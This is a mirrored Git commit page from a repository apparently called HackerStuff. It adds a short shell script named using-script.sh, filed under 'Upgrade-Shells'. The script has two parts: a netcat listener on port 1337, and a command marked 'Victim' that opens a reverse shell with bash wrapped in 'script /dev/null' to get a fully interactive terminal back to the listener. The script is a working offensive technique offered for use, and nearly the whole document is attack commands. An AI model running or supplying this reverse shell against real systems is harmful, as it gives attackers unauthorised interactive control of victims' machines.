mirror of
https://github.com/0xdade/HackerStuff.git
synced 2025-10-29 16:59:27 +00:00
Create using-script.sh
This commit is contained in:
5
Upgrade-Shells/using-script.sh
Normal file
5
Upgrade-Shells/using-script.sh
Normal file
@@ -0,0 +1,5 @@
|
||||
# Listener
|
||||
stty -echo raw ; nc -lp 1337; stty sane
|
||||
|
||||
# Victim
|
||||
nc -c '/bin/bash -c "script /dev/null"' listener 1337
|
||||
Reference in New Issue
Block a user